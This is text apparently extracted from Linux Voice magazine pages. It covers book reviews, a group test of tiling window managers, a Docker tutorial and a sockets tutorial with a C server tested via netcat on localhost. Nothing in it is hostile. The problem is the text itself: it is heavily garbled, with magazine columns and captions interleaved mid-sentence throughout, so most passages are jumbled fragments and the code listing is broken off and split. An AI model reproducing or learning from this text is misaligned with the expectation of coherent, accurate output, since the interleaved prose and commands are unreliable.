The main premise of Makers – that plenty of “maker”
we’re entering a third industrial revolution options available, this
driven by the ease of small companies Space goes on
book is published by a
producing custom products – seems forever.
large publishing firm.
shockingly naïve. According to this book, Astrophotography
soon these entrepreneurial makers and this will certainly spur on some We’re suckers for anything from space,
will take over the manufacturing world change. However, this book’s vision of especially photons as they travel from distant
because small-scale production is a third industrial revolution is unlikely to suns. What we’d really like to do is capture
them. This book looks like it’s going to be
becoming more cost effective. come to pass.
especially useful, starting as it does with a
They won’t. It’s easier to start a simple camera on a tripod.
business producing goods than it has LINUX VOICE VERDICT
ever been, and there will be a growing Author Chris Anderson
community of crowdfunded small-team Publisher Random House
products (Linux Voice is one), but this ISBN 978-1-847-94067-4
Price £8.99
will always be a small segment of the
A wildly optimistic book that overhypes the
developed economy. role of entrepreneurs in the economy.
Makers have started to be more
innovative than many large businesses,
For a quick
intro to
Homeland turn to page
Andrew Gregory sighs sadly at Orwell’s warnings. Programming JavaScript Apps
We like JavaScript. It’s a little like the BASIC of
the web, but it’s also capable of sprawling
here’s an early moment in great complexity, especially when combined
Homeland, the sequel to Corey Node.js, HTML 5 and other modern fun stuff.
Doctorow’s Little Brother, when Maybe the age of web and desktop application
the protagonist just happens to stumble unification isn’t that far off?
Surveillance, intrusive
across a game of Dungeons and Dragons
authorities and an
played by Will Wheaton, Mitch Kapoor and
economy hopelessly
the founders of the Electronic Frontier skewed against the
Foundation. This episode pulls you out little people. Thank
of the story and hits you over the head heavens it could
with the knowledge that the book has never happen here!
Something To Say.
That’s a shame, because it really does As a story, it’s a decent page turner and a
have something to say. We’re being step up from Little Brother. Best read in a
monitored at all times, by companies that crowed place with lots of witnesses… Ya tvoi sluga,
are under contract to our governments. Ya tvoi
The police are increasingly an agent of LINUX VOICE VERDICT
these companies rather than protectors Author Corey Doctorow Arduino Robotics
of the public. And we’re carrying mobile Publisher Titan Books If Ben’s awesome Arduino-based Nerf gun
telescreeens with us all the time, doing Big ISBN 9781781167489 targeting system (p90) has whet your appetite
Price £7.99
Brother’s job for him. for robots and self-defence, this book should
Turns a thousand paranoid Reddit and enable you to take on Skynet single handed by
As a message, Homeland is powerful, Slashdot comments into a decent thriller building your own robot army. It even claims to
and really crystallises the gut mistrust and a powerful warning.
include a DIY Segway!
that many of us feel into something that’s
easy to understand on a rational level. 53
Marco Fioretti tries a way to handle the windows on your
screen that will make you forget you ever had a mouse.
On Test Tiling window managers
Reclaim your screen and get more done!
URL indow Managers (WMs should be able to focus on getting
Version 0.6 from now on) are those things done, rather than
Licence BSD essential components continuously having to rearrange
A reduced, preconfigured of every desktop computer that windows by hand. To work even
version of Xmonad, made for control, move and decorate the faster, many operations that
people who want to start tiling windows in which all our programs traditional WMs attach to icons and
as soon as possible. menu entries only have keyboard
run. In a normal WM, you can spend
Herbstluftwm a significant amount of time just
moving and resizing windows. The
shortcuts here. Add to that the
possibility of not using the mouse
URL subjects of this Group Test were even on many popular programs,
Version 0.6.2
invented to avoid such annoyances. websites and web services, and you
Licence BSD
A semi-manual tiler that’s Tiling WMs deal with the can understand why some people
much easier to use than its windows you need as if they were, prefer this way of working.
name would suggest. you know, tiles – simple! They The very nature of tiling WMs is
automatically place and size all the also the reason why this may be the
windows in order to always cover Group Test with the ugliest
i3 all the available screen space, but screenshots you’ll see for a while,
URL without any overlap. What really but it’s not our fault. These
Version 4.7.2 makes a WM a tiling one, however, programs want to fill every available
Licence BSD is the capability to automatically pixel with window content, not with
A clean window manager with repeat the whole process, all by panels, menus, icons and real
a few little tools that make it itself, every time you open or close window borders. That leaves very,
quite powerful. a window. very little that remains visible in a
Tiling WMs are made to ignore print-size screenshot. It’s not a bug,
eye candy and save your time: you it’s a feature!
Version 2.5.0 “Tiling WMs deal with the windows you
need as if they were tiles – simple!”
Licence ISC
Yes, Spectrwm tiles windows in
pure UNIX/Linux style even on
Windows (and Mac OS).
A window manager shapes our should really be the last time you spend
Xmonad interaction with the computer much working on a WM until you decide to
more than raw processing power, or change it. That’s why we only
pleasant wallpapers. A really good WM considered WMs actively maintained
Version 0.11
makes you forget it exists, because it and supported WMs, which will install
Licence BSD doesn’t slow down your CPU and does immediately on any distribution.
The Emacs of tiling window what you need without you even This time, we deliberately focused on
managers. Can do pretty much realising that you asked for it. The same providing a general feeling and an
everything, if you just find the should be true for upgrades: it is overview of the possibilities of
right recipe for it. unavoidable that you’ll spend some time something that is hard to define by
on the initial configuration, but this comparing lists of features.
Tiling and window management Installation
How many ways are there to tile windows?
At least the installation should
be a point-and-click business.
ost distros have binary packages of
these WMs, but if yours doesn’t you
can build your own. Actual
installation of any of these WMs should not be
a problem at all – unless you happen to use a
very old or niche distribution, that is. In all other
cases, you should easily find a binary package
ready to be installed with a few clicks.
When this is not the case, it should still be
possible to install at least Xmonad and Bluetile
without really compiling anything. Haskell
programs such as these have their own
distro-independent online repository, called
HackageDB (
All the packages you can find there,
including those for Bluetile and Xmonad, can
be installed with the so-called Haskell
Platform. All you need is binary packages,
which really should exist for almost any
Two general cases of windows tiling (here shown in Herbstluftwm) that may require special distribution, for that platform and its installer,
care: multi-window programs like Gimp (bottom) and temporary, pop-up windows. called cabal. Once you have them, you will also
be able to get the two Haskell WMs up and
utomatic placement and sizing of In i3, programs are aligned horizontally running in ways similar to using yum or
windows, so they don’t overlap or vertically, inside several semi- apt-get from the command line with:
unless you really want them to, is independent containers. Only the focused #> cabal update
the raison d’être of tiling WMs. All our WMs window in the container is displayed. You #> cabal install xmonad
provide at least three different tiling get a list of windows at the top of each
algorithms, as well as ways to add new container. Spectrwm has a top (or left)
ones and remap all keyboard shortcuts so resizeable master area, reserved for the
they don’t interfere with those of your applications that “currently need most
favourite programs. attention”. All the other windows go into a
Some WMs, like Herbsluftwm and i3, separate stack. You can put any window
leave you more control of windows. you want in the master area, or in a
Others, like Xmonad and Bluetile, are “auto floating layer, and change stacking mode
tilers”: they will apply the chosen tiling on the fly. Spectrwm also acknowledges
scheme automatically, while still allowing “quirks” – instructions to handle certain
manual or custom placement. Spectrwm programs in special ways. For example,
is somewhere in the middle. Our this configuration command:
competitors can also show one window at Gimp:gimp FLOAT + ANYWHERE
a time, full screen basically means “let the Gimp application
Multi-window tiling layouts differ in how do as it pleases”.
they partition the screen and in how they Herbstluftwm is based on “frames”,
decide where the next windows goes: you which can be empty or contain many
may have, for example, horizontal or windows, and be split into sub-frames. By
vertical stacks, actual grids with rows and default, there are nine full-screen Binary packages for many tiling Wms are available
columns, or windows being added in spiral workspaces, which you can name in the standard repositories of most distros.
sequences (as happens with Xmonad and however you want.
Bluetile) or in binary tree structures VERDICT
(herbsluftwm and i3). VERDICT Bluetile
Xmonad makes it easy to have a Bluetile i3
Herbstluftwm Spectrwm
different tiling mode in each workspace. i3 Xmonad
To place windows manually in this WM, Xmonad
press Alt+Left Click and drag them. 55
Customisation User interface
User friendliness is a feature.
Make your WM work for your.
t first sight, the behaviour of all configurability of hotkeys and tiling
he Xmonad community has already our tiling window managers is the schemes, and in what you can do with
published thousands of lines of code same: they all completely cover their optional status bars.
that you can use to customise it, from your screen with windows, without any Whatever WM you choose, do yourself
complex configuration files to third-party decoration worth mentioning, and let you a favour: before you even get started,
extensions and assorted hacks. The “Manage do everything without even looking at your change the default terminal to one of
Hooks” mechanism of Xmonad is widely used mouse. The big differences are in the those we recently reviewed in LV004.
to define actions to perform automatically on
certain windows when, for example, the
corresponding programs start. Bluetile
Testing changes is easy: save the new code Bluetile is not an independent WM done ancestor, Bluetile starts up with a friendly
and type xmonad –recompile to check if it from scratch, but is rather a version of taskbar and window title bars with
works. If it does, type xmonad --restart or Xmonad, tweaked and preconfigured unusual but effective grid menus (see
press Alt+Q to load the new configuration. especially for people without much time. screenshot), and the taskbar has the only
Bluetile is very closely related to Xmonad, It’s also set up to integrate well in the built-in “Quit” button you’ll see in this
but this doesn’t mean that it can reuse code or traditional Gnome desktop. Group Test. Other buttons increase or
tricks developed for its ancestor. Unlike This integration with a mainstream decrease the number of windows in the
Xmonad, Bluetile doesn’t come with the desktop environment is enough, in our Bluetile master area. You can also move
capability to compile and load new code on opinion, to make Bluetile quite different windows or maximise any of them with
the spot. from Xmonad. For example, unlike its the mouse.
Spectrwm partially supports the EWMH
(Extended Window Manager Hints) standard.
Programs like wmctrl can use it to control
whole workspaces or single windows. You can
write simple shell scripts, for example, that
move to a different workspace, resize or
maximise a specific Spectrwm window, as
Bluetile is the only WM in
soon as some condition occurs. this test that by default
I3 and Herbstluftwm provide similar gives windows a title bar
functionality, but in different ways. The i3-msg with a pop-up, grid-like
utility understands the traditional IPC (Inter menu.
Process Communication) protocol. Coupled
with i3-nagbar it can do almost anything.
The herbstclient tool, by contrast, passes Herbstluftwm
whatever command you give it from the Herbstluftwm isn’t a random string, but default terminal. To toggle between all
command line to Herbstluftwm. The actions German for “Autumn Air”. Its default status the available tiling schemes on the fly,
you can perform in this way include, but are bar is the friendlier of the bunch: press Alt+Space. Herbstluftwm is
not limited to, workspace reconfiguration and workspace numbers and the name of the configured by issuing commands with the
changing the style of the window borders. active window on the left, date and time herbstclient utility. This makes it possible,
Another area in which you can play at will is on the right. It is also easy to add gauges in principle, to change the configuration
(dynamic) configuration of mouse focus. Both and other graphic information with a automatically, depending on the time of
Xmonad and i3, for example, have settings custom panel. The main shortcut to the day, system load or any other event
dedicated to define whether the focus should remember is Alt+Enter, which opens the that can trigger a script.
follow the mouse or not. Disabling this
behaviour even temporarily is very useful if you
don’t want to find yourself suddenly typing in
another window of your laptop because you
brushed its touchpad by mistake.
i3 Well done status bar, sensible
Xmonad tiling algorithm. The only really
difficult part of Herbstluftwm
is its name.
I3 is primarily designed for “advanced
users and developers”. Working in i3 is
just grab and drag the borders of a
window with your mouse to resize them. Accessories
also meant to be similar to using the Vi The status bar is almost invisible with
text editor: many keybindings are similar, the default settings, even for a WM that’s We all like extras.
and there is a mode to resize windows supposed to be frugal with pixels. You can
independent from normal operations. In change the workspace names from sing the whole screen is all good, but
spite of that, this is a WM in which you can numbers to anything you want. sooner or later you’ll probably start
longing for some status info. Or
maybe you think that you would switch to a
tiling WM, if only it had menus and launchers.
Don’t worry. There’s no need to give up these
niceties in order to use a tiling WM. It is
necessary, however, to install and configure
It’s hard to see it from this
screenshot, but i3 provides some extra tools manually, in the good old
both a status bar with Unix and X-Window tradition. The dzen2 utility,
workspace buttons, and title for example, adds a spartan, but effective
bars for each window. status bar with customisable icons.
Other common tools that you can bind to
dedicated hotkeys are scrot, for screenshots,
Spectrwm and xlock for locking the screen. The feh
Spectrwm (originally named “Scrotwm”!), pretty fast and relatively easy to use. We program can add wallpapers.
was created “by hackers, for hackers”, with couldn’t figure out why, but on the Fedora Recipes in the Xmonad documentation and
ports for Windows and Mac OS X 20 test box used for this Group Test the FAQ explain how to add system trays such as
developed to “make those systems useful Alt+Shift+Enter combination did not start trayer, or clipboards like parcellite. Then
for Unix people”. Talk about attitude! a terminal as the man page says. Thanks there’s dmenu, an application launcher that
The interface consists of an adequate to the integration with the dmenu would work in any of our WMs. Once you have
status bar on the top, complete with launcher, bound to Alt+P, we had three installed it, press Alt+P to launch it, type the
workspace numbers (or names), and is terminals open in a beat. first letters of the program you want to start
and press Enter.
While Xmonad comes out on top in this
category, the other WMs aren’t far behind.
Spectrewm, for example, can get the content
of its status bar from any program associated
with its bar_action option. A very powerful
choice, reusable also as input for xmobar, is
The stacking (on the right) the Conky system monitor: start it in text
and master areas of mode, setting out_to_x no and out_to_console
Spectrwm. yes, and it will send any system data it is able
to collect to the status bar of your WM.
Xmonad has a really bare look – if you can Looks aside, Xmonad can do, or at least
call the absence of practically any visual emulate in some way, practically
element in its default configuration a look. everything you are used to do in more
Don’t let that fool you though. Xmonad is popular WMs. The lack of a real button or
like Emacs: both programs can be hot key to minimise a window, for
customised in endless ways. It is possible example, is compensated by the
to decorate windows, and easy to make possibility to send the same window to a
them float. separate workspace.
Xmonad status bars (the yellow stripe split in two
for convenience) can contain any data you want.
Xmonad really exploits Bluetile
every pixel you give it – no Herbstluftwm
default status bar, no buttons, i3
nothing. However, that’s still Xmonad
not enough to make certain
websites readable when tiled. 57
Desktop integration
Keep the rest of the desktop happy.
e’re referring to integration example, to make sessions start with
with the so-called display the right mix of applications, you are
managers, and with modern supposed to play with .xsession files
desktops in general. For example, and similar stuff. This isn’t rocket
unless you know what you were doing, science by any means, but it’s probably
you might get to the end of your first unknown territory for everybody who
session in a tiling window manager and started using Linux less than a few
wonder how to get out of it (many of us years ago.
had this same sensation the first time Bluetile is the best from this point of
we tried Gnome 3). view, since you don’t need a dedicated Telling Gnome (or KDE) to start a tiling WM is easy, and
Of course, there are keyboard login to use it. This program is makes it fit in better with the rest of the desktop.
shortcuts for this in all the window specifically designed to integrate with
managers we’re looking at here. Gnome. You can log in as usual, and sessions list of your display manager.
However, depending on what distro and Otherwise, depending on your
WM you’re running, the next user may
end up staring at a black screen, “You will probably need to distribution, you will have to edit one or
more of the files called .session, .xinitrc
instead of the normal display Manager, do a bit of extra work keep and .gnomerc in your home directory,
novice users happy.”
and your programs may want to as explained in the relevant
“restore from crash” at your next login. documentation of each WM. Rumour
The bottom line: to run a tiling WM on has it that it’s faster to edit the
a computer shared with Linux novices then start it from a terminal. To start it .gnomerc file, but we couldn’t verify it in
who won’t accept anything different automatically, launch the gnome- our tests.
than a vanilla login screen, you will session-properties tool, and add
probably need to do a bit of extra work Bluetile to the list of start-up apps. VERDICT
to make them happy. If the binary package of a WM Bluetile
The reason is that tiling WMs often includes a .desktop configuration file i3
deal with these issues according to the (as those for Fedora 20 do) it should Xmonad
Linux standard from 10 years ago. For show up without such tricks in the
Ask and it shall be given, seek and ye shall find…
ith programs like these, the There’s even a “How to write a config
first and possibly the only file” page, which gives instructions on
two pieces of how to test new configurations. The
documentation you may need are, official FAQ and wiki are great too. The
without question, a cheatsheet with all official blog and Twitter account are Cheatsheets are an absolute must when using a tiling WM.
the available hot keys, and the dead, but the mailing list, Reddit group
instructions to remap those keys to and IRC channel (#xmonad at irc.
whatever you prefer. There’s a good, if are active. Luckily, a great tutorial on the Arch
incomplete cheatsheet with the main The homepage of Bluetile offers just Linux wiki (
default bindings for Xmonad shown in a list of the most used hotkeys. That index.php/spectrwm) fills this void. The
the screenshot, which you can isn’t a problem, as you can reuse most two man pages for Herbstluftwm and
download at of the XMonad resources to learn how its valet application, herbstclient,
haskellwiki/File:Xmbindings.png. to use and configure Bluetile. remain the primary sources of
Xmonad also has the most After the Xmonad/Bluetile pair, the information for this WM.
documentation and online support. The best documentation is that of i3: much
mandatory starting point is the official less than that for the Haskell duo, but VERDICT
Guided Tour ( more than enough to explain everything Bluetile
html). In addition to that, the website you may need. The Spectrwm man i3
offers many links to guides for pretty page is good, but is pretty much the Xmonad
much anything you may think of. only official documentation there is.
Tiling window managers
e said it right at the monitor, before deciding that tiling You can easily complement the Xmonad status bar with a system
beginning: a window is not for you. tray for icons and notifiers of any kind.
manager forces you to Herbstluftwm is a worthy effort,
reconsider how you use your
computer. Therefore, in a Group
but not really ahead of the
competition in any field. The same
1st Xmonad
Licence BSD Version 0.11
Test like this, feature lists matter could be said for Spectrwm. Bluetile
less than helping you to ask is good, but, in our opinion, only
yourself the right questions. Can because it is a (very well done) The current version of Xmonad is some years old, but that’s only
you be more productive with Xmonad showcase. because the code is completely mature.
nothing to click on, and windows We like i3 a lot. It’s simple, well
that keep resizing themselves to designed and documented, and 2nd i3
completely hide that wonderful accessories like the nagbar and Licence BSD Version 4.7.2
wallpaper of your last holiday? i3-msg are very powerful.
First, a warning: the first time that Xmonad has been defined by its
you’re reading a web page and click developers as more of a “library for I3 is a good match between completeness, ease of use, and
on “Open Link In New Window” writing tiling WMs” than an actual, very powerful tools to extend it.
“Can you really be more productive with 3rd Spectrwm
windows that keep resizing themselves?”
Licence ISC Version 2.5.0
It may take a bit more time to make it work just like you need,
you’ll find that the page you were finished product, and we tend to
but the “quirks” and other features of Spectrwm can do a lot.
just reading suddenly gets four agree. You can and should build
times smaller and flies to another yourself your perfect tiling WM with
part of the screen. You may find the components that Xmonad 4th Herbstluftwm
this a little annoying. What’s more, provides. Yes, we know: Haskell Licence BSD Version 0.6.2
several popular websites become looks like some ancient scroll
completely unusable if the browser straight from Atlantis but… do you
A great tool, and dynamically reconfigurable with easy shell
window is too narrow. To use such really care? With so many ready scripts – it just needs more documentation.
sites in a tiling WM (without having configuration files online, and its
to zoom out so much that it makes active community, you just need to
your eyes hurt), you must learn to ask politely to find out what code
5th Bluetile
make the browser window float, at (or lines in a configuration file) you Licence BSD Version 0.6
least temporarily. need to copy and paste to get
So, be patient! Schedule at least a Xmonad working right for you. Bluetile comes in last only because we wanted to put
couple of hours to practise, with a So Xmonad it is – but you may completely independent projects first – it’s still a great WM!
printed cheatsheet right beside your wish to practise with Bluetile first…
If you’ve been bitten by the tiling bug you’ll for volume control and clipboard, email compiler and know how to start it. Alopex and
find plenty out there to try. Bspwm, for notification and supports autohiding widgets. Monsterwm have the same requirement.
example, does things the old Unix way: it The common ancestor and inspiration for Want more? Point your favourite browser
doesn’t do much by itself, but you can glue it all the current tiling managers for Linux is to the tiling window manager comparison
together with a few small utilities to make it called Dwm, which is still around. Its main table at the fantastic Arch Linux wiki
do what you want. Besides, it can split any disadvantage is that you have to recompile it (
window in two whenever you feel like it. Then to make it load changes in configuration. This Comparison_of_Tiling_Window_
there is Awesome, which has ready shortcuts isn’t really a big deal, but you need to install a Managers#Comparison_table). 59
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Nick Veitch has a whale of a time with containers
Virtualisation, fixed. That’s the premise of containers in general and Docker in particular.
o get a better idea of what Docker is
and how it can be of use to you, it is
easier to start with the problems
that Docker was created to solve. The
project’s logo of a whale as a container ship
lays it out somewhat – Docker is
containerisation, which as far as possible
tries to be at once as generic as possible (so
you can put whatever you want in your
container) and as efficient as possible (so
you don’t need to put absolutely everything
in your container).
As we saw in LV003 (you missed it?
really? You can subscribe you know, so we
never have to have this conversation again)
there are great benefits to containers over
VMs (see the boxout, right). LXC, or Linux
Containers, is far and away the best
implementation of such a system on Linux,
and recently reached a stable 1.0 milestone.
Aside from being wildly useful for Hurrah for Ubuntu! Other versions of Linux are available, honest
development work in general, LXC is also the
technology underlying Docker. versions and such. It also means you can containers. You may want to imagine
If LXC is so great at containers, you may suck down new versions of a container from Docker as a sort of portable, version-
be wondering why you need Docker. Well, of upstream (which includes only the deltas, so controlled build system.
course, you don’t need it just to use no huge files) if you are building on top of But let’s not waste time – let’s see how we
containerisation. However, for the specific someone else’s work. can get it to work for us.
use case of developing and deploying N Stacking Docker intelligently ‘stacks’
applications, Docker adds several very components, and re-uses them where Docker
helpful features on top of LXC: possible. For example, you could build an 1 Install docker
Versioning Docker includes version- application on top of Apache and Ubuntu, Find out if packages are available for your
control capabilities for tracking different which could contain three separate distro or grab the source code (this is a bit
revisions of a container, and doing all the components, but if you changed only the messy, as it’s written in Go) from the
usual cool stuff such as generating diffs application, the other two stacked website. For Ubuntu (Trusty) you can just:
between revisions, rolling back to previous components would remain the same. This apt-get install
makes for smaller bits to transfer around, On some distros (like Ubuntu) the
and also saves resources if you are creating/ command and package are known as
Sudo or not sudo deploying similar things. to avoid confusion with the
Newer versions of Docker use sockets to N Sharing There is a public registry existing KDE docker applet (in which case,
handle networking, which means on many ( ) of containers use instead of docker in the
Linux variants, having to use sudo to run already created by others, so you don’t have following steps). You may also need to use
Docker commands. You can get around this
to do everything from scratch all the time. sudo to run the docker command (see box)
by creating a group for Docker and giving
N Integration Docker provides an API, which 2 Fetch some images
it the necessary privileges – check out the
Docker page for more info means that other tools, particularly devops As mentioned before, there is a collaborative
tools, can easily interact with your index of images, and also some official
images for things you might want to use.
You can ‘pull’ these images to download
them locally for use:
docker pull ubuntu
This will fetch a bunch of Ubuntu images.
You can see what you have by running:
docker images
This will return a list of image tags, their ID
and some other useful info. The tags make it
easier to tell what images you have, but the
ID number is important. This is a generated
UUID that you will be able to use to identify
versions (like in GitHub).
3 Run an image
To run something in a container, we use the
docker run <image id> <command>
the image ID you give can usually just be the
first five characters – enough to distinguish
it from the others. For example, the ID for the
‘trusty’ image we downloaded might be Building a Docker file doesn’t take long, but the results can last a lifetime. Probably.
99ec81b80c55, but I could run:
docker run 99ec cat /etc/lsb-release storage is now different. If I were to run create a Docker file like this
Which would fire up the container and run docker ps -l now, it would give me a different FROM evilnick/vim
the command. The output in this case would ID for my image, as well as telling me the
tell me what version of Ubuntu I was running. last command I ran. If I want to permanently RUN apt-get update
You will notice that containers are process keep this image, I would commit these RUN apt-get install -y apache2
driven. The command ran, there was output changes to a local repository like so:
and then it returned, so the container docker commit 079e13 evilnick:vim ENV APACHE_RUN_USER www-data
stopped running. We will see how to keep Now the Vim image is stored in my ENV APACHE_RUN_GROUP www-data
them running in a bit, but let’s talk about repository and I can run that any time I like.
versioning first. Try this: 4 Buildadockerfile EXPOSE 80
docker run 99ec apt-get install -y vim As well as running commands as instances, These commands are pretty self-
This installs Vim (unreasonably absent you can make a “Docker file” which is simply explanatory. The FROM specifies a source
from the minimal image) onto the container. a recipe for things for the container to do. If I image. The lines that begin with RUN
the -y switch, by the way, stops it from wanted to install the Apache 2 server on the execute those commands. The ENV
asking silly questions. So, the persistent image I just created, for example, I might directive causes environmental variables to
be set in the container. EXPOSE tells docker
Containers vs VMs that port 80 should be opened on the
container (this will be mapped to a random
For longer than you think, people have the most pervasive annoyance of VMs is that port on the host). To build this I run:
worried about consistency in platforms and you need a complete OS image for them to sudo docker build -t ‘evilnick:vim-apache’ .
about getting software to run reliably on an run – if you want to ship or store your 5 Run containers
underlying platform that it wasn’t written software pre-loaded in a VM, you have to
To run a container interactively, you just
specifically to work on. In fact, that is how store everything else too.
Virtual Machines came to be invented, not Containers, on the other hand, view the need to pass a few extra flags to Docker:
just because it was cool to fool your laptop problem differently. For shipping, testing and docker run -t -i 992e7 /bin/bash
into thinking it was a Macbook. IBM invented running software applications, the This will run Bash on the container, and
the idea of the modern VM back in the 60s as application is the only thing that needs to be stay connected until you exit. You can use
a way to test improvements to their hardware in its own place (as long as the other parts this shell to make further changes to your
and OS, a legacy that lives on in their highly can be standardised). Container systems container if you like.
effective z/VM OS for mainframes. such as LXC (which is used by Docker)
A VM though requires overheads. Most separate out the bits you need to be separate Going further
implementations on Linux require processors (the application’s view of where it is running) There is of course much more you can do
designed specifically to support while retaining as much of the underlying
with containers – we have just outlined the
virtualisation. They also require dedicated system as possible (the kernel, resources
basic mechanics here. Fortunately, there is a
resources – you have to allocate things like and such).The disadvantage of containers?
disk space and memory to a VM, and if your You can’t run a completely different OS, and great deal of good documentation on the
solution requires other specific hardware, the shared resources mean that multiple Docker website. I heartily recommend the
you need to virtualise that too. Perhaps still containers can end up fighting over them. interactive tutorial on building Docker files
– 63
A veteran Unix and Linux
enthusiast, Chris Brown has
written and delivered open
source training from New Delhi
to San Francisco, though not on
the same day. Dive under the skin of your Linux system to find out what really makes it tick.
Sockets, UDP and TCP
This month, we’ll get plugged in with sockets, which span the world.
he term “sockets” refers to an API (a Successive datagrams sent over a wide- Barney Rubble at Bedrock. Each and every
set of library routines) that enables area network may get routed differently and letter I send to him has to have Barney’s
us to write clients and servers that arrive in the wrong order. address on the envelope; based on that
communicate with the TCP and UDP The TCP and UDP protocols lie on top of information alone the letter is routed
protocols. A socket is sometimes described IP and are of more direct interest to us if through the postal system and delivered. I
as a communication endpoint; it’s where the we’re writing socket-based programs. don’t get notification of delivery; I don’t even
transport provider (the TCP or UDP layer) get notification of non-delivery.
and the application programs meet. UDP Every datagram sent by a program has to
Let’s talk first about the underlying IP UDP stands for User Datagram Protocol and have a destination address (an IP address
layer. IP (Internet Protocol) has the is the simpler of the two. In fact it adds very and port number) specified. When a
important job of delivering a datagram to the little on top of IP except for the concept of a program transmits a UDP datagram there is
correct recipient machine (based on its IP port number (a 16-bit value) that enables no guarantee that it will arrive and no
address). The IP layer handles all the routing datagrams to be sent to a specific endpoint notification if it doesn’t. UDP simply inherits
decisions. However, IP does not offer (effectively, to a specific application or the Internet Protocol’s failure of not
guaranteed delivery. If a packet goes service) on the destination machine. guaranteeing to deliver the datagrams or get
missing, it just goes missing; there’s no UDP sockets provide a “connectionless” them in the right order. Of course, if the
mechanism to automatically re-send it. Also, communication model, and sometimes communication is taking place within a local
there’s no guarantee that the packets will they’re compared to the postal service. network it’s difficult to see how datagrams
arrive in the same order they were sent. Suppose I’m in regular postal contact with might become mis-ordered; nonetheless,
UDP makes no guarantees about delivery
Client Server order. It is sometimes known (unfairly) as
the “Unreliable Datagram Protocol”.
Client Upper case SSH Web Information exchange
application server server server For many UDP-based services the lack of a
“first sent, first received” guarantee isn’t an
issue. Take DNS for example: it listens on
37161 1067 22 80 UDP port 53, receives a lookup request, and
sends a reply. Next request, next reply. There
Arbitrarily assigned is never a sequence of datagrams that form
ephemeral port Well-known part of the same interaction.
port Other UDP-based services handle things
differently. For example, the Trivial File
Transfer Protocol (TFTP) (which does use a
IP address IP address sequence of datagrams that form part of the same interaction), solves the problem by
Network having every datagram explicitly
acknowledged within the application layer,
so that the whole thing stays in lock-step.
Clients use arbitrary “ephemeral” ports, server bind “well-known” ports. The tuple {client port, client IP, Now let’s look at TCP (Transmission
server port, server IP} identifies a TCP connection Control Protocol). Like UDP, it’s also layered
Try It Out – Build and test the upper-case server
You can easily build this server. Either type the code Now open a new terminal window and verify that $ nc localhost 1067
in, or grab it from our magazine landing page on the server is listening on the expected port: Hello World $ lsof -i TCP:1067 HELLO WORLD
Put it into a file called ucserver.c. Next, ensure COMMAND PID USER FD TYPE DEVICE SIZE/OFF This is a test
you’ve got the gcc compiler installed. On Ubuntu, NODE NAME THIS IS A TEST
for example it’s installed simply as: ucserver 12575 chris 3u IPv4 272606 0t0 TCP ^D
$ sudo apt-get install gcc *:1067 (LISTEN) Success! Not the world’s most exciting service
Now build your executable: We can use netcat (also know as nc) as a handy I grant you. But what do you expect for 40 lines of
$ gcc ucserver.c -o ucserver client program to test our server by telling it to code? You can also run the test “non-interactively”
Assuming it compiles without errors, run it in the connect to port 1067. All nc is doing is connecting by piping into nc like this:
foreground: to the port and ferrying lines of text back and forth, $ echo “Hello World” | nc localhost 1067
./ucserver like this: HELLO WORLD
over IP, and like UDP it adds the notion of simultaneously. A UDP-based service such commonly, TCP servers use a process-per-
port numbers to identify a specific endpoint. as TFTP is basically holding out a bucket client or thread-per-client model to achieve
But TCP is considerably more complicated, labelled “Port 69”. Any client can lob a concurrency when serving multiple clients.
offering a reliable, sequenced, connection- datagram into the bucket, and in general the I’m going to inflict some C code on you to
oriented service. server will find itself fishing datagrams out show how sockets really work. Our example
Sometimes people refer to TCP as a of the bucket from various clients in some is a simple TCP-based server; the “service” is
“guaranteed” delivery service, but we should arbitrarily interleaved order. Usually, a simply to convert any text received by the
be clear what is meant by that. If you unplug UDP-based server is single-threaded, with client to upper case, and send it back.
the network cable from your server, TCP the thread looping round on the request to Here’s the code. (The lines numbers are
won’t guarantee to deliver packets to it, nor “get the next datagram from the bucket”. just for reference; they aren’t part of the file)
can you write in and ask for your money TCP-based services are different; each 1 #include <stdio.h>
back when it fails. The reliability of a TCP accepted connection results in a new file 2 #include <netinet/in.h>
connection results from a process of descriptor. In the simplest case, a server 3
“positive acknowledgement with re- might complete its dialog with one client 4 #define SERVER_PORT 1067
transmission” – essentially, senders expect before accepting a connection from the 5 #define BUFSIZE 100
a confirmation of receipt of the segments of next, but this will keep subsequent clients 6
data they transmit, and will re-send them if waiting if a client has opened the connection 7 /* ------ service() ------- */
they don’t get one. and then gone for a cup of tea. More 8
The main thing we need to understand is
the connection-oriented nature of the
Client and server ends in a TCP connection
service, and a common analogy is with a
telephone call. Edward Bear wants to call Server operations
Maisie Bear to invite her to a picnic. He
provides addressing information “up front” Create
when he dials Maisie’s phone number socket
(analogous to specifying an IP address and
a port number when establishing a TCP
Bind a port number
connection) and Maisie needs to answer the
to the socket
phone (accept the connection) but from Client operations
then on they have the illusion of a piece of
copper wire connecting their phones. In my Tell TCP to listen Create
analogy, the client and server have a file for connections socket
descriptor referencing the connection.
Edward and Maisie simply speak into the Accept
phone. Maisie doesn’t need to repeatedly tell connection Connect to server
the telephone company “please deliver this
sentence to Edward Bear”, there is a
connection and they simply speak on the Read Write
phone. In my analogy, the client and server
simply read and write on their file descriptor.
Write Read
Design choices
The choice of UDP or TCP protocols has a
fundamental effect on the way in which
Close connection Close connection
services are written, particularly if they want
to be able to service multiple clients 65
address and a port number) and a SOCK_
STREAM transport (which means we want
TCP not UDP). Lines 29–32 bind our socket
to port 1067 (as defined by SERVER_PORT
up at line 4); the mysterious constant
INADDR_ANY that appears here means that
we’re willing to listen for connections on any
of our server’s network interfaces. If the
machine has only one interface this isn’t
really an issue, but if a machine has, say, an
inward-facing connection and an internet-
facing connection, you could choose to
accept connections on only one of them.
Choose your socket
At line 34 we tell the system that we want to
accept connections on this socket;
specifically we set up a queue (of length 5)
for incoming connection requests. Then at
Even teddy bears have a choice between connectionless and connection-oriented protocols. line 35 we enter our service loop. Line 37 will
block until a client comes along to connect;
9 void service(int in, int out) complicated than you might think they when this happens the accept() call wakes
10 { should, but that’s because the API is up and returns a new file descriptor (fd)
11 char buffer[BUFSIZE]; designed to support a wide variety of referencing the connection. At line 39 we call
12 int i, len; protocols, not just TCP and IPV4. our little service() function, which actually
13 while ((len = read(in, buffer, BUFSIZE)) > 0) The action starts at line 28, where our carries out the conversation with the client,
14 { server creates a socket, requesting an then when this returns we’re careful to close
15 for (i = 0 ; i < len; i++) address family of AF_INET (which means the file descriptor. If we didn’t do this we
16 buffer[i] = toupper(buffer[i]); that the socket will be identified by an IP would consume a new descriptor for each
17 write(out, buffer, len);
18 }
19 } Try It Out – Create a concurrent server
